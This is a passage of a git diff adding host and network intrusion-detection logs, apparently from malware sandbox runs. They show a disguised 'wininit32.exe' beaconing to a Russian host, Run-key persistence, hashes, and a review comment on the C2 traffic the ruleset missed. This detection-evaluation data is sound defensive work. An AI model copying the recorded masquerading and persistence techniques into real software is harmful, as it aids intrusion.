DESKTOP-HUE026H\\John Williams\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 172.16.2.2\r\nSourceHostname: DESKTOP-HUE026H.localdomain\r\nSourcePort: 49718\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 216.239.36.21\r\nDestinationHostname: \r\nDestinationPort: 80\r\nDestinationPortName: http\""""},""eventdata"":{""ruleName"":""Usermode"",""utcTime"":""2020-05-26 16:21:40.112"",""processGuid"":""{df9fc3d3-41ca-5ecd-0000-001001f90300}"",""processId"":""3772"",""image"":""C:\\\\Users\\\\Public\\\\Documents\\\\wininit32.exe"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""protocol"":""tcp"",""initiated"":""true"",""sourceIsIpv6"":""false"",""sourceIp"":""172.16.2.2"",""sourceHostname"":""DESKTOP-HUE026H.localdomain"",""sourcePort"":""49718"",""destinationIsIpv6"":""false"",""destinationIp"":""216.239.36.21"",""destinationPort"":""80"",""destinationPortName"":""http""}}}", +"May 26, 2020 @ 16:21:41.455",14,"ATT&CK: Suspicious Program Location with Network Connections","""Network connection detected: +RuleName: Usermode +UtcTime: 2020-05-26 16:21:37.737 +ProcessGuid: {df9fc3d3-41ca-5ecd-0000-001001f90300} +ProcessId: 3772 +Image: C:\Users\Public\Documents\wininit32.exe +User: DESKTOP-HUE026H\John Williams +Protocol: tcp +Initiated: true +SourceIsIpv6: false +SourceIp: 172.16.2.2 +SourceHostname: DESKTOP-HUE026H.localdomain +SourcePort: 49717 +SourcePortName: +DestinationIsIpv6: false +DestinationIp: 91.240.87.131 +DestinationHostname: remindarb.fvds.ru +DestinationPort: 80 +DestinationPortName: 
http""",,,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""3"",""version"":""5"",""level"":""4"",""task"":""3"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T16:21:38.880873000Z"",""eventRecordID"":""1625"",""processID"":""2080"",""threadID"":""1180"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Network connection detected:\r\nRuleName: Usermode\r\nUtcTime: 2020-05-26 16:21:37.737\r\nProcessGuid: {df9fc3d3-41ca-5ecd-0000-001001f90300}\r\nProcessId: 3772\r\nImage: C:\\Users\\Public\\Documents\\wininit32.exe\r\nUser: DESKTOP-HUE026H\\John Williams\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 172.16.2.2\r\nSourceHostname: DESKTOP-HUE026H.localdomain\r\nSourcePort: 49717\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 91.240.87.131\r\nDestinationHostname: remindarb.fvds.ru\r\nDestinationPort: 80\r\nDestinationPortName: http\""""},""eventdata"":{""ruleName"":""Usermode"",""utcTime"":""2020-05-26 16:21:37.737"",""processGuid"":""{df9fc3d3-41ca-5ecd-0000-001001f90300}"",""processId"":""3772"",""image"":""C:\\\\Users\\\\Public\\\\Documents\\\\wininit32.exe"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""protocol"":""tcp"",""initiated"":""true"",""sourceIsIpv6"":""false"",""sourceIp"":""172.16.2.2"",""sourceHostname"":""DESKTOP-HUE026H.localdomain"",""sourcePort"":""49717"",""destinationIsIpv6"":""false"",""destinationIp"":""91.240.87.131"",""destinationHostname"":""remindarb.fvds.ru"",""destinationPort"":""80"",""destinationPortName"":""http""}}}", +"May 26, 2020 @ 16:21:37.798",14,"ATT&CK: Suspicious Program Location with Network Connections","""Network connection detected: +RuleName: Usermode +UtcTime: 2020-05-26 16:21:33.759 +ProcessGuid: {df9fc3d3-41ca-5ecd-0000-001001f90300} +ProcessId: 3772 +Image: 
C:\Users\Public\Documents\wininit32.exe +User: DESKTOP-HUE026H\John Williams +Protocol: tcp +Initiated: true +SourceIsIpv6: false +SourceIp: 172.16.2.2 +SourceHostname: DESKTOP-HUE026H.localdomain +SourcePort: 49715 +SourcePortName: +DestinationIsIpv6: false +DestinationIp: 91.240.87.131 +DestinationHostname: +DestinationPort: 80 +DestinationPortName: http""",,,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""3"",""version"":""5"",""level"":""4"",""task"":""3"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T16:21:34.974537900Z"",""eventRecordID"":""1623"",""processID"":""2080"",""threadID"":""1180"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Network connection detected:\r\nRuleName: Usermode\r\nUtcTime: 2020-05-26 16:21:33.759\r\nProcessGuid: {df9fc3d3-41ca-5ecd-0000-001001f90300}\r\nProcessId: 3772\r\nImage: C:\\Users\\Public\\Documents\\wininit32.exe\r\nUser: DESKTOP-HUE026H\\John Williams\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 172.16.2.2\r\nSourceHostname: DESKTOP-HUE026H.localdomain\r\nSourcePort: 49715\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 91.240.87.131\r\nDestinationHostname: \r\nDestinationPort: 80\r\nDestinationPortName: http\""""},""eventdata"":{""ruleName"":""Usermode"",""utcTime"":""2020-05-26 16:21:33.759"",""processGuid"":""{df9fc3d3-41ca-5ecd-0000-001001f90300}"",""processId"":""3772"",""image"":""C:\\\\Users\\\\Public\\\\Documents\\\\wininit32.exe"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""protocol"":""tcp"",""initiated"":""true"",""sourceIsIpv6"":""false"",""sourceIp"":""172.16.2.2"",""sourceHostname"":""DESKTOP-HUE026H.localdomain"",""sourcePort"":""49715"",""destinationIsIpv6"":""false"",""destinationIp"":""91.240.87.131"",""destinationPort"":""80"",""destinationPortName"":""http""}}}", +"May 26, 2020 @ 16:20:40.147",14,"ATT&CK T1036: Execution in Non-Executable Folder","""Process Create: +RuleName: +UtcTime: 2020-05-26 16:20:26.960 +ProcessGuid: {df9fc3d3-41ca-5ecd-0000-001001f90300} +ProcessId: 3772 +Image: C:\Users\Public\Documents\wininit32.exe +FileVersion: ? +Description: ? +Product: ? +Company: ? +OriginalFileName: ? +CommandLine: C:\ProgramData\Documents\wininit32.exe +CurrentDirectory: C:\ProgramData\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-41c7-5ecd-0000-00202b340300} +LogonId: 0x3342B +TerminalSessionId: 1 +IntegrityLevel: High +Hashes: MD5=B32FD85A86BB626F3BA68CCDAAA3FABD,SHA256=E9C29C057C95F3F03785C4CF0FE89D379EF72A382D5500DC769975A5D2E7C799,IMPHASH=00000000000000000000000000000000 +ParentProcessGuid: {df9fc3d3-41bf-5ecd-0000-0010404d0100} +ParentProcessId: 1168 +ParentImage: C:\Windows\System32\svchost.exe +ParentCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p""","C:\\ProgramData\\Documents\\wininit32.exe",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T16:20:30.395407600Z"",""eventRecordID"":""1552"",""processID"":""2080"",""threadID"":""3568"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-26 16:20:26.960\r\nProcessGuid: {df9fc3d3-41ca-5ecd-0000-001001f90300}\r\nProcessId: 3772\r\nImage: 
C:\\Users\\Public\\Documents\\wininit32.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: C:\\ProgramData\\Documents\\wininit32.exe\r\nCurrentDirectory: C:\\ProgramData\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-41c7-5ecd-0000-00202b340300}\r\nLogonId: 0x3342B\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: MD5=B32FD85A86BB626F3BA68CCDAAA3FABD,SHA256=E9C29C057C95F3F03785C4CF0FE89D379EF72A382D5500DC769975A5D2E7C799,IMPHASH=00000000000000000000000000000000\r\nParentProcessGuid: {df9fc3d3-41bf-5ecd-0000-0010404d0100}\r\nParentProcessId: 1168\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k netsvcs -p\""""},""eventdata"":{""utcTime"":""2020-05-26 16:20:26.960"",""processGuid"":""{df9fc3d3-41ca-5ecd-0000-001001f90300}"",""processId"":""3772"",""image"":""C:\\\\Users\\\\Public\\\\Documents\\\\wininit32.exe"",""fileVersion"":""?"",""description"":""?"",""product"":""?"",""company"":""?"",""originalFileName"":""?"",""commandLine"":""C:\\\\ProgramData\\\\Documents\\\\wininit32.exe"",""currentDirectory"":""C:\\\\ProgramData\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-41c7-5ecd-0000-00202b340300}"",""logonId"":""0x3342b"",""terminalSessionId"":""1"",""integrityLevel"":""High"",""hashes"":""MD5=B32FD85A86BB626F3BA68CCDAAA3FABD,SHA256=E9C29C057C95F3F03785C4CF0FE89D379EF72A382D5500DC769975A5D2E7C799,IMPHASH=00000000000000000000000000000000"",""parentProcessGuid"":""{df9fc3d3-41bf-5ecd-0000-0010404d0100}"",""parentProcessId"":""1168"",""parentImage"":""C:\\\\Windows\\\\System32\\\\svchost.exe"",""parentCommandLine"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p""}}}", +"May 26, 2020 @ 16:20:36.108",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to 
failed",,,,, +"May 26, 2020 @ 16:20:25.053",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,,, +"May 26, 2020 @ 16:15:25.339",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = DESKTOP-HUE026H\John Williams; ClientProcessId = 4272; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory WHERE Tag='Physical Memory 0'; ResultCode = 0x80041032; PossibleCause = Unknown""",,,, diff --git a/data/MW_4_NIDS.csv b/data/MW_4_NIDS.csv new file mode 100644 index 0000000..2e2ba0f --- /dev/null +++ b/data/MW_4_NIDS.csv 
@@ -0,0 +1,9 @@ +"@timestamp",message,"log.file.path" +"May 26, 2020 @ 16:22:08.347","05/26-16:21:58.724406 [**] [1:2020716:2] ET POLICY Possible External IP Lookup ipinfo.io [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49718 -> 216.239.36.21:80","/var/log/snort/alert.fast" +"May 26, 2020 @ 16:22:08.346","05/26/2020-16:21:58.923989 [**] [1:2020716:5] ET POLICY Possible External IP Lookup ipinfo.io [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49718 -> 216.239.36.21:80","/var/log/suricata/fast.log" +"May 26, 2020 @ 16:21:43.335","05/26-16:21:41.456169 [**] [1:2020716:2] ET POLICY Possible External IP Lookup ipinfo.io [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49718 -> 216.239.36.21:80","/var/log/snort/alert.fast" +"May 26, 2020 @ 16:21:43.334","05/26/2020-16:21:41.801699 [**] [1:2020716:5] ET POLICY Possible External IP Lookup ipinfo.io [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49718 -> 216.239.36.21:80","/var/log/suricata/fast.log" +"May 26, 2020 @ 16:14:28.344","05/26-16:14:23.585943 [**] [1:2020716:2] ET POLICY Possible External IP Lookup ipinfo.io [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49743 -> 216.239.38.21:80","/var/log/snort/alert.fast" +"May 26, 2020 @ 16:14:28.326","05/26/2020-16:14:23.748423 [**] [1:2020716:5] ET POLICY Possible External IP Lookup ipinfo.io [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49743 -> 216.239.38.21:80","/var/log/suricata/fast.log" +"May 26, 2020 @ 16:14:13.324","05/26/2020-16:14:07.747734 [**] [1:2020716:5] ET POLICY Possible External IP Lookup ipinfo.io [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49743 -> 216.239.38.21:80","/var/log/suricata/fast.log" +"May 26, 
2020 @ 16:14:13.314","05/26-16:14:07.583782 [**] [1:2020716:2] ET POLICY Possible External IP Lookup ipinfo.io [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49743 -> 216.239.38.21:80","/var/log/snort/alert.fast" diff --git a/data/MW_5_HIDS_3.csv b/data/MW_5_HIDS_3.csv new file mode 100644 index 0000000..1096c7a --- /dev/null +++ b/data/MW_5_HIDS_3.csv 
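Review bot: Every alert in this file is the ET POLICY `Possible External IP Lookup ipinfo.io` signature (sid 2020716) against 216.239.36.21 and 216.239.38.21 on port 80, while the Sysmon event 3 rows in data/MW_4_HIDS_3.csv show the same process (`C:\Users\Public\Documents\wininit32.exe`, PID 3772, source 172.16.2.2) connecting repeatedly to 91.240.87.131 (`remindarb.fvds.ru`) on port 80 with no corresponding NIDS alert. The file therefore records a policy-class hit on an IP-lookup service rather than a detection of the process's other outbound traffic, and anyone scoring NIDS coverage from row counts alone would overstate it. Suggest a short data-dictionary note stating which alert classifications count as a detection for the per-sample results, and that the 91.240.87.131 flows went unalerted in this run. The timestamps in both files (16:14–16:22 on May 26, 2020, same host) indicate this is the same run, so the gap is a property of the ruleset rather than of mismatched captures, as far as is visible here.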
@@ -0,0 +1,125 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details" +"May 28, 2020 @ 10:04:55.501",12,"Sysmon - Suspicious Process - explorer.exe","""Process Create: +RuleName: +UtcTime: 2020-05-26 09:39:19.800 +ProcessGuid: {df9fc3d3-e3c7-5ecc-0000-00101ad44500} +ProcessId: 3744 +Image: C:\Windows\SysWOW64\explorer.exe +FileVersion: 10.0.18362.693 (WinBuild.160101.0800) +Description: Windows Explorer +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: EXPLORER.EXE +CommandLine: C:\Windows\SysWOW64\explorer.exe +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-dfe2-5ecc-0000-0020502d0300} +LogonId: 0x32D50 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962 +ParentProcessGuid: {df9fc3d3-e37f-5ecc-0000-001040364400} +ParentProcessId: 2272 +ParentImage: C:\Windows\SysWOW64\explorer.exe +ParentCommandLine: C:\Windows\SysWOW64\explorer.exe""","C:\\Windows\\SysWOW64\\explorer.exe",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T09:39:19.805618100Z"",""eventRecordID"":""1771"",""processID"":""2176"",""threadID"":""3312"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-26 09:39:19.800\r\nProcessGuid: {df9fc3d3-e3c7-5ecc-0000-00101ad44500}\r\nProcessId: 3744\r\nImage: C:\\Windows\\SysWOW64\\explorer.exe\r\nFileVersion: 
10.0.18362.693 (WinBuild.160101.0800)\r\nDescription: Windows Explorer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: EXPLORER.EXE\r\nCommandLine: C:\\Windows\\SysWOW64\\explorer.exe\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-dfe2-5ecc-0000-0020502d0300}\r\nLogonId: 0x32D50\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962\r\nParentProcessGuid: {df9fc3d3-e37f-5ecc-0000-001040364400}\r\nParentProcessId: 2272\r\nParentImage: C:\\Windows\\SysWOW64\\explorer.exe\r\nParentCommandLine: C:\\Windows\\SysWOW64\\explorer.exe\""""},""eventdata"":{""utcTime"":""2020-05-26 09:39:19.800"",""processGuid"":""{df9fc3d3-e3c7-5ecc-0000-00101ad44500}"",""processId"":""3744"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe"",""fileVersion"":""10.0.18362.693 (WinBuild.160101.0800)"",""description"":""Windows Explorer"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""EXPLORER.EXE"",""commandLine"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-dfe2-5ecc-0000-0020502d0300}"",""logonId"":""0x32d50"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962"",""parentProcessGuid"":""{df9fc3d3-e37f-5ecc-0000-001040364400}"",""parentProcessId"":""2272"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe"",""parentCommandLine"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe""}}}", +"May 28, 2020 @ 10:04:07.923",12,"Sysmon - 
Suspicious Process - explorer.exe","""Process Create: +RuleName: +UtcTime: 2020-05-26 09:38:32.217 +ProcessGuid: {df9fc3d3-e398-5ecc-0000-001064334500} +ProcessId: 2200 +Image: C:\Windows\SysWOW64\explorer.exe +FileVersion: 10.0.18362.693 (WinBuild.160101.0800) +Description: Windows Explorer +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: EXPLORER.EXE +CommandLine: C:\Windows\SysWOW64\explorer.exe +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-dfe2-5ecc-0000-0020502d0300} +LogonId: 0x32D50 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962 +ParentProcessGuid: {df9fc3d3-e37f-5ecc-0000-001040364400} +ParentProcessId: 2272 +ParentImage: C:\Windows\SysWOW64\explorer.exe +ParentCommandLine: C:\Windows\SysWOW64\explorer.exe""","C:\\Windows\\SysWOW64\\explorer.exe",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T09:38:32.219753200Z"",""eventRecordID"":""1769"",""processID"":""2176"",""threadID"":""3312"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-26 09:38:32.217\r\nProcessGuid: {df9fc3d3-e398-5ecc-0000-001064334500}\r\nProcessId: 2200\r\nImage: C:\\Windows\\SysWOW64\\explorer.exe\r\nFileVersion: 10.0.18362.693 (WinBuild.160101.0800)\r\nDescription: Windows Explorer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: EXPLORER.EXE\r\nCommandLine: 
C:\\Windows\\SysWOW64\\explorer.exe\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-dfe2-5ecc-0000-0020502d0300}\r\nLogonId: 0x32D50\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962\r\nParentProcessGuid: {df9fc3d3-e37f-5ecc-0000-001040364400}\r\nParentProcessId: 2272\r\nParentImage: C:\\Windows\\SysWOW64\\explorer.exe\r\nParentCommandLine: C:\\Windows\\SysWOW64\\explorer.exe\""""},""eventdata"":{""utcTime"":""2020-05-26 09:38:32.217"",""processGuid"":""{df9fc3d3-e398-5ecc-0000-001064334500}"",""processId"":""2200"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe"",""fileVersion"":""10.0.18362.693 (WinBuild.160101.0800)"",""description"":""Windows Explorer"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""EXPLORER.EXE"",""commandLine"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-dfe2-5ecc-0000-0020502d0300}"",""logonId"":""0x32d50"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962"",""parentProcessGuid"":""{df9fc3d3-e37f-5ecc-0000-001040364400}"",""parentProcessId"":""2272"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe"",""parentCommandLine"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe""}}}", +"May 28, 2020 @ 10:03:43.219",12,"Sysmon - Suspicious Process - explorer.exe","""Process Create: +RuleName: +UtcTime: 2020-05-26 09:38:07.507 +ProcessGuid: {df9fc3d3-e37f-5ecc-0000-001040364400} +ProcessId: 2272 +Image: 
C:\Windows\SysWOW64\explorer.exe +FileVersion: 10.0.18362.693 (WinBuild.160101.0800) +Description: Windows Explorer +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: EXPLORER.EXE +CommandLine: C:\Windows\SysWOW64\explorer.exe +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-dfe2-5ecc-0000-0020502d0300} +LogonId: 0x32D50 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962 +ParentProcessGuid: {df9fc3d3-e37b-5ecc-0000-0010e4c94300} +ParentProcessId: 2740 +ParentImage: C:\Users\John Williams\AppData\Roaming\Microsoft\Eofgx\ywpeoq.exe +ParentCommandLine: ""C:\Users\John Williams\AppData\Roaming\Microsoft\Eofgx\ywpeoq.exe""""","C:\\Windows\\SysWOW64\\explorer.exe",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T09:38:07.510583000Z"",""eventRecordID"":""1766"",""processID"":""2176"",""threadID"":""3312"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-26 09:38:07.507\r\nProcessGuid: {df9fc3d3-e37f-5ecc-0000-001040364400}\r\nProcessId: 2272\r\nImage: C:\\Windows\\SysWOW64\\explorer.exe\r\nFileVersion: 10.0.18362.693 (WinBuild.160101.0800)\r\nDescription: Windows Explorer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: EXPLORER.EXE\r\nCommandLine: C:\\Windows\\SysWOW64\\explorer.exe\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: 
{df9fc3d3-dfe2-5ecc-0000-0020502d0300}\r\nLogonId: 0x32D50\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962\r\nParentProcessGuid: {df9fc3d3-e37b-5ecc-0000-0010e4c94300}\r\nParentProcessId: 2740\r\nParentImage: C:\\Users\\John Williams\\AppData\\Roaming\\Microsoft\\Eofgx\\ywpeoq.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\AppData\\Roaming\\Microsoft\\Eofgx\\ywpeoq.exe\""\""""},""eventdata"":{""utcTime"":""2020-05-26 09:38:07.507"",""processGuid"":""{df9fc3d3-e37f-5ecc-0000-001040364400}"",""processId"":""2272"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe"",""fileVersion"":""10.0.18362.693 (WinBuild.160101.0800)"",""description"":""Windows Explorer"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""EXPLORER.EXE"",""commandLine"":""C:\\\\Windows\\\\SysWOW64\\\\explorer.exe"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-dfe2-5ecc-0000-0020502d0300}"",""logonId"":""0x32d50"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=710CD555C00C29C59152DD50CAA553ED,SHA256=6E6E91554392595D18EE3D691258FC1D23E19DDC1E0BD6C26051DEBB8B70E5FD,IMPHASH=C3681D33DE70933393BD754BC4BCE962"",""parentProcessGuid"":""{df9fc3d3-e37b-5ecc-0000-0010e4c94300}"",""parentProcessId"":""2740"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Roaming\\\\Microsoft\\\\Eofgx\\\\ywpeoq.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Roaming\\\\Microsoft\\\\Eofgx\\\\ywpeoq.exe\\\""""}}}", +"May 28, 2020 @ 10:03:08.010",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-26 09:37:32.291 +ProcessGuid: 
{df9fc3d3-e198-5ecc-0000-00109c992e00} +ProcessId: 3556 +Image: C:\Windows\SysWOW64\explorer.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\wrzaxthjp +Details: ""C:\Users\John Williams\AppData\Roaming\Microsoft\Eofgx\ywpeoq.exe""""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\wrzaxthjp","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T09:37:32.292211100Z"",""eventRecordID"":""1745"",""processID"":""2176"",""threadID"":""3312"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-26 09:37:32.291\r\nProcessGuid: {df9fc3d3-e198-5ecc-0000-00109c992e00}\r\nProcessId: 3556\r\nImage: C:\\Windows\\SysWOW64\\explorer.exe\r\nTargetObject: 